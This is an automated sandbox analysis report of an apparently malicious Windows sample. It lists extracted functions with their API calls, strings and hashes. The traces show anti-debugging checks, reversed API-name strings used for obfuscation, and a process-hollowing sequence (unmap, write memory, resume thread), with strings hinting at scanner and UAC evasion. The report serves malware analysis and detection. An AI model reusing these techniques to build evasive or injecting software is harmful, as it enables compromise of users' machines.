Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 44b73617091b32bdfc8ac8e12d923b84ee953e6f7ca318e9005fa4dc3c4d30dc
Instruction ID: cc081a8e6a5925bd5d2caa4533694a67f308e6729e61637f91f9a87abc0d9af5
Opcode Fuzzy Hash: 44b73617091b32bdfc8ac8e12d923b84ee953e6f7ca318e9005fa4dc3c4d30dc
Instruction Fuzzy Hash: 0DF037B1EC1254AEE710AE6AA849F56F7ACE785F14F40097ABD0A87240C7715C90CBA0

Function 02DAF744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 02DAF754
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DAF766
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DAF77D

Strings

CheckRemoteDebuggerPresent, xrefs: 02DAF760
KernelBase, xrefs: 02DAF74F

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 8831fd2bf21d27a8a31eb8f748286d88cc428b8c5283e5b34a03af9ffcfc1132
Instruction ID: 504f1ee3d0ee4f64bfedc7b9c76c98db64cc148f6d9afd134e41089bfc1b72dd
Opcode Fuzzy Hash: 8831fd2bf21d27a8a31eb8f748286d88cc428b8c5283e5b34a03af9ffcfc1132
Instruction Fuzzy Hash: B9F0A771904248BEEB10A7B88898BDCFBB99B05329F2447D0A435626C1E7724A84CAE1

Function 02DADD70 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02D94F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DADE40), ref: 02DADDAB
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DADE40), ref: 02DADDDB
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DADDF0
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DADE1C
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DADE25

Part of subcall function 02D94C60: SysFreeString.OLEAUT32(02DAF4A4), ref: 02D94C6E

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: 98081839e91b1d4d6f2f4c8ad98c953cd7420f322fe5aa2a22ee93ab2e7ffcfb
Instruction ID: f072af1221ca82652dd061165b551fff0cef5b000d268c21ffaa57498ec9b9af
Opcode Fuzzy Hash: 98081839e91b1d4d6f2f4c8ad98c953cd7420f322fe5aa2a22ee93ab2e7ffcfb
Instruction Fuzzy Hash: C921CF71A50309BEEB51EAE4CC52FDEB7BDEB48700F500461B601F76C1DAB4AE058BA4

Function 02DAE4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DAE5F6

Strings

ScanBuffer, xrefs: 02DAE53F
OpenSession, xrefs: 02DAE598
Initialize, xrefs: 02DAE4E6

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 5fbda7b2db9802b0ae829179218fd2308cb23b39a0a5c1427970511c15655d13
Instruction ID: ca9b14ce1840353341b73314a2af53dc4f81bf2091f288255e122b847f29b52e
Opcode Fuzzy Hash: 5fbda7b2db9802b0ae829179218fd2308cb23b39a0a5c1427970511c15655d13
Instruction Fuzzy Hash: 08414C35A10148AFEF10EBA8D850EDEB3BAEF88704F604835F041A7352DA74AD06CF65

Function 02DADC8C Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02D94F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DADD5E), ref: 02DADCCB
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DADD05
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DADD32
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DADD3B

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 47d17816091fdd65fff7c7f4e74e308e7ee5fc54276fe4fc96fe61c5e3a3e4ab
Instruction ID: 7f413db71d74676657275e6b4ba6a0d2ea18ce0be1cce791e1d70cc499768d44
Opcode Fuzzy Hash: 47d17816091fdd65fff7c7f4e74e308e7ee5fc54276fe4fc96fe61c5e3a3e4ab
Instruction Fuzzy Hash: 2421ED71A41209BEEB10EBA4DD52FDEB7BDEB04B00F614461B600F76C1D7B46E058B64

Function 02DA7A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E

Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DA7A9F

Strings

yromeMlautriVetacollAwZ, xrefs: 02DA7A47
ntdll, xrefs: 02DA7A74

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: b39ad3166a790048bbe7154c17d21791ce488f737c1058f916a38abb39a95722
Instruction ID: ed0f75415f1a18a57dc3cd561bccc0de8522fea94bde7abb75c5b0a19dd9cbe4
Opcode Fuzzy Hash: b39ad3166a790048bbe7154c17d21791ce488f737c1058f916a38abb39a95722
Instruction Fuzzy Hash: 36112D75684208BFEB04EFA4EC61EAEB7EDEB48B00F908461B905D7740D630AE558B74

Function 02DA7A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E

Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DA7A9F

Strings

yromeMlautriVetacollAwZ, xrefs: 02DA7A47
ntdll, xrefs: 02DA7A74

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 64b8f961a2b4a9771eb83ba6735d8f5de7ad7bd1136c25887b97eaceda2afcb3
Instruction ID: aa8afab9e1e651bdbedd9e5c104bfa428eb3e8caef7a43937a1acaf4c27ef376
Opcode Fuzzy Hash: 64b8f961a2b4a9771eb83ba6735d8f5de7ad7bd1136c25887b97eaceda2afcb3
Instruction Fuzzy Hash: 7E112D75684208BFEB04EFA4EC61E9EB7ADEB48B00F908461B905D7740D630AE558B74

Function 02DA8400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E

Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA8471

Strings

yromeMlautriVdaeRtN, xrefs: 02DA841B
ntdll, xrefs: 02DA8448

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2521977463-737317276
Opcode ID: 8182e6c96b58f553aed0708a339efcd9850cea55f625e89c57e22570ed20f20e
Instruction ID: fd10fc22a8b8e43eb7086327d4d9de08b9ae8ed445c095cbe89bc68a24abf294
Opcode Fuzzy Hash: 8182e6c96b58f553aed0708a339efcd9850cea55f625e89c57e22570ed20f20e
Instruction Fuzzy Hash: 45014075644208AFEB40EFA4EC51E9EB7EEFB49B00F514460F904D7700D774AD519B64

Function 02DA7D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E

Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA7DEC

Strings

Ntdll, xrefs: 02DA7DC3
yromeMlautriVetirW, xrefs: 02DA7D93

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: 947bd184eb53674891031d9f3986e4e1447978ea186527d4c91bee0d0a478891
Instruction ID: 49a72e7b5540e5bcfcc8040acacb80648557f96a9136dbbf4b55c8118be86aef
Opcode Fuzzy Hash: 947bd184eb53674891031d9f3986e4e1447978ea186527d4c91bee0d0a478891
Instruction Fuzzy Hash: C4010C75680209AFEB00EF99EC61E9EB7EDEB49B00F504860B905D7740D730AE558B75

Function 02DA8670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E

Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9

NtUnmapViewOfSection.NTDLL(?,?), ref: 02DA86D5

Strings

ntdll, xrefs: 02DA86B8
noitceSfOweiVpamnUtN, xrefs: 02DA868B

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$SectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 3503870465-2520021413
Opcode ID: a41f931500c5b311a91cd73a7275f448490c16c449061043b6994669820a8c4b
Instruction ID: 1157c801880c65b5ae39d9351d41c5da500507091cadba275caa1e8b74b13800
Opcode Fuzzy Hash: a41f931500c5b311a91cd73a7275f448490c16c449061043b6994669820a8c4b
Instruction Fuzzy Hash: 32016274A80204AFEB00EFA5EC61E5EB7EEEB49B00F914464B800D7740D634AD41DA24

Function 02DADBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlI.N(?,?,00000000,02DADC7E), ref: 02DADC2C
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DADC7E), ref: 02DADC42
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DADC7E), ref: 02DADC61

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Path$DeleteFileNameName_
String ID:
API String ID: 4284456518-0
Opcode ID: c3092f177f96d71ba03943f11c79aa84a9dc0bbb1f4a0c5d7f3dc7a431d26d62
Instruction ID: c7125f0cf80e9e53527e046b63a4a916c7db70d8dc4e2b589d7f334b8da42dcf
Opcode Fuzzy Hash: c3092f177f96d71ba03943f11c79aa84a9dc0bbb1f4a0c5d7f3dc7a431d26d62
Instruction Fuzzy Hash: FB016275A452086EEB05EBA09D51FCD77BAEB48704F514492A240E6681DAB4AF048B35

Function 02DADC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02D94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02D94F2E

RtlI.N(?,?,00000000,02DADC7E), ref: 02DADC2C
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DADC7E), ref: 02DADC42
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DADC7E), ref: 02DADC61

Part of subcall function 02D94C60: SysFreeString.OLEAUT32(02DAF4A4), ref: 02D94C6E

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: PathString$AllocDeleteFileFreeNameName_
String ID:
API String ID: 1530111750-0
Opcode ID: e29b248b4e59c2e7736f8974df1b48670d19100bfcfa5d576e6aca837a3dca7e
Instruction ID: 974771b1f4400862f678687f2f09bcc056b370d5cb993d40cabc9c09bfabef16
Opcode Fuzzy Hash: e29b248b4e59c2e7736f8974df1b48670d19100bfcfa5d576e6aca837a3dca7e
Instruction Fuzzy Hash: 1F01F47694020CBEDB11EBA0DD52FCDB3BEEB48704F5144A1E601E2680EB746F048A74

Function 02DA6DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02DA6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02DA6DB9,?,?,?,00000000), ref: 02DA6D99

CoCreateInstance.OLE32(?,00000000,00000005,02DA6EAC,00000000,00000000,02DA6E2B,?,00000000,02DA6E9B), ref: 02DA6E17

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 6d18d6d20e23981490234127c33ca87c98ec7eedfdddbe981c3c18bdedfddd63
Instruction ID: 466a54afb0c2db95104bcc17bb2554e0a5834d53fa50d8aa34b71c4dc170be5e
Opcode Fuzzy Hash: 6d18d6d20e23981490234127c33ca87c98ec7eedfdddbe981c3c18bdedfddd63
Instruction Fuzzy Hash: 3501DFB1208704AEEF11EF61EC32C6BBBADE749B00F514835F505E2780E671DE0088B0

Function 02DB8128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02DA89D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02E1738C,Function_0000662C,00000004,02E1739C,02E1738C,05F5E103,00000040,02E173A0,74AD0000,00000000,00000000), ref: 02DA8AAA

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F0B7E0,02F0B824,OpenSession,02E17380,02DBB7B8,UacScan,02E17380), ref: 02DB86E9
ResumeThread.KERNEL32(00000000,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8), ref: 02DB8D33
CloseHandle.KERNEL32(00000000,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,00000000,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380), ref: 02DB8EB2

Part of subcall function 02DA894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize,02E173A8,02DAA93C,UacScan), ref: 02DA8960
Part of subcall function 02DA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DA897A
Part of subcall function 02DA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize), ref: 02DA89B6

CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02E17380,02DBB7B8,UacInitialize,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,UacScan,02E17380), ref: 02DB92A4

Part of subcall function 02D97E5C: GetFileAttributesA.KERNEL32(00000000,?,02DB041F,ScanString,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,UacInitialize), ref: 02D97E67

Part of subcall function 02DADC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DADD5E), ref: 02DADCCB
Part of subcall function 02DADC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DADD05
Part of subcall function 02DADC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DADD32
Part of subcall function 02DADC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DADD3B

Part of subcall function 02DA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DA83C2), ref: 02DA83A4

ExitProcess.KERNEL32(00000000,OpenSession,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,Initialize,02E17380,02DBB7B8,00000000,00000000,00000000,ScanString,02E17380,02DBB7B8), ref: 02DBB2FA

Strings

SLLoadApplicationPolicies, xrefs: 02DB9F08
UacScan, xrefs: 02DB841C, 02DB85A5, 02DB86FE, 02DB88A4, 02DB8A31, 02DB8BC5, 02DB8D44, 02DB8FBB, 02DB9429, 02DB9643, 02DB9824, 02DB99BD, 02DB9BF3, 02DBAA63
NtAlertResumeThread, xrefs: 02DBA611
EnumServicesStatusW, xrefs: 02DBA9C1
